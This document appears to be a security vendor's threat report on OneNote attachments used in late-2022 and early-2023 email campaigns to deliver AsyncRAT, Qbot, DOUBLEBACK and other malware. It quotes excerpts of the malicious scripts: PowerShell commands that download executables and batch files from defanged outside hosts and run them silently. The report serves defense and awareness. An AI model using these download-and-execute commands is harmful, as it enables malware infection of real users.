OneNote Documents Increasingly Used to Deliver Malware

Key Findings:

• The use of Microsoft OneNote documents to deliver malware via email is increasing.
• Multiple cybercriminal threat actors are using OneNote documents to deliver malware.
• While some campaigns are targeted at specific industries, most are broadly targeted and include thousands of messages.
• In order to detonate the payload, an end-user must interact with the OneNote document. 
• Campaigns have impacted organizations globally, including North America and Europe.
• TA577 returned from a month-long hiatus in activity and began using OneNote to deliver Qbot at the end of January 2023.

Overview

Proofpoint researchers recently identified an increase in threat actor use of OneNote documents to deliver malware via email to unsuspecting end-users in December 2022 and January 2023. OneNote is a digital notebook created by Microsoft and available via the Microsoft 365 product suite. Proofpoint has observed threat actors deliver malware via OneNote documents, which are .one extensions, via email attachments and URLs.

Proofpoint observed six campaigns in December 2022 using OneNote attachments to deliver AsyncRAT malware. In January 2023, Proofpoint observed over 50 OneNote campaigns delivering different malware payloads including AsyncRAT, Redline, AgentTesla, and DOUBLEBACK. Notably, the initial access broker TA577 began using OneNote documents to deliver Qbot at the end of January 2023. The campaigns included multiple senders and subjects, with different targeting and volume depending on the campaign.

While we have seen an increase in the number of campaigns utilizing OneNote to deliver malware, its use is unusual. Based upon our observed characteristics of past threat campaigns, it is believed that threat actors have increasingly adopted OneNote as of result of their experimentation with different attachment types to bypass threat detection. Since Microsoft began blocking macros by default in 2022, threat actors have experimented with many new tactics, techniques, and procedures (TTPs), including use of previously infrequently observed filetypes such as virtual hard disk (VHD), compiled HTML (CHM), and now OneNote (.one).

The technique may be effective for now. At the time of analysis, multiple OneNote malware samples observed by Proofpoint were not detected by numerous anti-virus vendors on VirusTotal. Proofpoint continues to assess these activity clusters and does not attribute them to a tracked threat actor. 

Campaign Details

Observed email campaigns that use OneNote for malware delivery share similar characteristics. While the message subjects and senders vary, nearly all campaigns use unique messages to deliver malware, and do not typically utilize thread hijacking. Messages typically contain OneNote file attachments with themes such as invoice, remittance, shipping, and seasonal themes such as Christmas bonus, among other subjects. In mid-January 2023, Proofpoint researchers observed actors using URLs to deliver OneNote attachments that use the same TTPs for malware execution. This includes a TA577 campaign observed on 31 January 2023.

The OneNote documents contain embedded files, often hidden behind a graphic that looks like a button. When the user double clicks the embedded file, they will be prompted with a warning. If the user clicks continue, the file will execute. The file might be different kinds of executables, shortcut (LNK) files, or script files such as HTML application (HTA) or Windows script file (WSF).

The number of campaigns using OneNote attachments increased significantly between December 2022 and 31 January 2023. Additionally, while Proofpoint only observed OneNote campaigns deliver AsyncRAT in December, researchers observed seven additional malware payloads distributed via OneNote attachments in January 2023: Redline, AgentTesla, Quasar RAT, XWorm, Netwire, DOUBLEBACK, and Qbot. Campaigns targeted organizations globally including in North America and Europe.

Figure 1: Number of OneNote Campaigns in December 2022 through 31 January 2023, and total number of OneNote campaigns based on malware type.

The observed increase in the total number of campaigns and diversity in payload type suggests multiple actors of various levels of sophistication are now using OneNote. While some clusters appear to be related based on command and control (C2), lures, and targeting, most campaigns use different infrastructure, message and lure themes, and targeting. Only one campaign was able to be attributed to a tracked actor, TA577.

December 2022 Campaigns

Two December 2022 campaigns included senders purporting to be an aerospace entity and included attachment names related to machine parts and specifications. Messages contained a OneNote attachment containing an HTA file that calls a PowerShell script to download an executable (e.g., Excel.exe) from a URL. These messages targeted entities in manufacturing and industrial verticals.

Figure 2: OneNote lure spoofing TP Aerospace.

Excerpt of script:

oShell.Run "cmd /c powershell Invoke-WebRequest -Uri hxxp[:]3.101.39[.]145/TPAEROSPACE.one -OutFile $env:tmp\kp.one; PowerShell Start-Process -Filepath $env:tmp\kp.one; Start-Sleep -Seconds 1  " & DontShowWindow, WaitUntilFinished

oShell.Run "cmd /c powershell Invoke-WebRequest -Uri hxxp[:]3.101.39[.]145/Excel.exe -OutFile $env:tmp\system32.exe; PowerShell Start-Process -Filepath $env:tmp\system32.exe; Start-Sleep -Seconds 1   " & DontShowWindow, WaitUntilFinished

Other campaigns leveraged invoice and shipping themes that included broad targeting and included thousands of messages, as well as “Christmas bonus” or “Christmas gift” lures that largely targeted organizations in the education sector among others. For example, one campaign, as illustrated below, spoofed a major consumer brand purporting to provide customers with a special gift. This campaign included thousands of messages largely targeting users in the education sector, among others.

Figure 3: Christmas gift themed lures containing OneNote attachments to deliver AsyncRAT.

These campaigns used the same TTPs as described above, delivering a OneNote attachment that used PowerShell to download the AsyncRAT payload from a URL.

January 2023 Campaigns

Proofpoint has observed over 50 campaigns leveraging OneNote attachments from 01 – 31 January 2023. These campaigns typically included thousands of messages and did not target specific organizations or verticals. The campaigns continued to use the same TTPs, with hidden embedded files in the OneNote attachment that ultimately lead to the download of a malware payload. In multiple campaigns, the actors used the legitimate services “OneNote Gem” and Transfer.sh to host payloads. On 19 January 2023, Proofpoint observed two campaigns using URLs to deliver OneNote attachments that led to XWorm and DOUBLEBACK payloads.

Nearly all campaigns included themes related to shipping, invoices, taxes, or other generic business-related themes. After exclusively observing AsyncRAT payloads through December and early January, researchers observed QuasarRAT and XWorm malware campaigns on 09 January 2023 alongside AsyncRAT. Redline and AgentTesla were first observed on 11 January 2023, and Netwire first observed on 12 January 2023. Several of the OneNote documents investigated by Proofpoint researchers include a file history, indicating that the same threat actor is re-using a file and replaces the payload URLs to create a new file.

While most campaigns are in English, researchers identified one campaign using invoice themes delivering XWorm and AsyncRAT that included both English and French languages in the lure. Messages contained a OneNote attachment containing a PowerShell script to download a batch file (system32.bat) from a URL.

Figure 4: Malware campaign delivering XWorm and AsyncRAT payloads using invoice themes with messages in English and French.

Excerpt of script:

ExecuteCmdAsync "cmd /c powershell Invoke-WebRequest -Uri hxxps[:]stnicholaschurch[.]ca/Invoice.one -OutFile $env:tmp\invoice.one; Start-Process -Filepath $env:tmp\invoice.one"

ExecuteCmdAsync "cmd /c powershell Invoke-WebRequest -Uri hxxps[:]stnicholaschurch[.]ca/Cardlock_341121.bat -OutFile $env:tmp\system32.bat; Start-Process -Filepath $env:tmp\system32.bat"

Notably, on 19 January 2023, Proofpoint researchers observed a low-volume campaign distributing the DOUBLEBACK backdoor. DOUBLEBACK is an in-memory backdoor that can enable host and network reconnaissance, data theft, and follow-on payloads. DOUBLEBACK was previously used by TA579. This was the first observed OneNote campaign to use thread hijacking. Messages contained URLs on several domains with a URI ending with /download/[guid]. The actor purported to previously have contacted the victim and that the related files had been uploaded to cloud storage. The URL led to the download of a zip file (example 4752-23 Order Confirmation.zip) that contained a OneNote with the same name.

Figure 5: DOUBLEBACK lure and OneNote attachment.

When the OneNote was opened, the template advised the victim to "Double Click To View File". If the victim did this, OneNote would attempt to execute a VBS file (example JnNNj3.vbs) embedded behind the button. The victim would first be prompted about security risks about opening attachments. If the victim continued, the VBS would be fully executed. The VBS downloaded a PowerShell script to run DOUBLEBACK. Proofpoint has observed additional DOUBLEBACK campaigns using similar TTPs and does not attribute this campaign to a tracked threat actor.

The initial access broker TA577 returned from a month-long hiatus in activity on 31 January 2023 to deliver Qbot with an attack chain that included OneNote. Emails appeared to be replies to previous conversations containing a unique URL in the email body.

Figure 6: OneNote document lure used by TA577.

The URLs led to the download of a zipped OneNote file. If the OneNote was opened, the template advised the victim to "Double click Open". Below the graphic there was an attached file named attachment.hta (but the extension was hidden). If the victim double clicked the file and confirmed the security prompt, JavaScript code was executed that downloads a file from a remote URL and displayed a fake error message. The HTA uses "curl.exe” to download the Qbot DLL, and run it with the function, “Wind”.

While the December 2022 campaigns included more customized and targeted messages and themes, the malware campaigns observed in January 2023 were more generic and broadly targeted. Proofpoint does not attribute identified campaigns to a tracked threat actor.

OSINT Assessment

Proofpoint researchers have associated multiple artifacts observed in the campaigns with GitHub repositories associated with user MREXw. This includes the payload domain “direct-trojan[.]com” and a batch file encryption technique. Researchers contacted the domain host to alert users the domain is malicious.

Conclusion

Proofpoint has increasingly observed OneNote attachments being used to deliver malware. Based on our research, we believe multiple threat actors are using OneNote attachments in an attempt to bypass threat detections. TA577’s adoption of OneNote suggests other more sophisticated actors will begin using this technique soon. This is concerning: TA577 is an initial access broker that facilitates follow-on infections for additional malware including ransomware. Based on data in open-source malware repositories, initially observed attachments were not detected as malicious by multiple anti-virus engines, thus it is likely initial campaigns had a high efficacy rate if the email was not blocked. (Proofpoint customers were protected as the messages were deemed malicious). It is likely more threat actors will adopt OneNote attachments to deliver malware.

It is important to note, an attack is only successful if the recipient engages with the attachment, specifically by clicking on the embedded file and ignoring the warning message displayed by OneNote. Organizations should educate end users about this technique and encourage users to report suspicious emails and attachments.

Sample Indicators of Compromise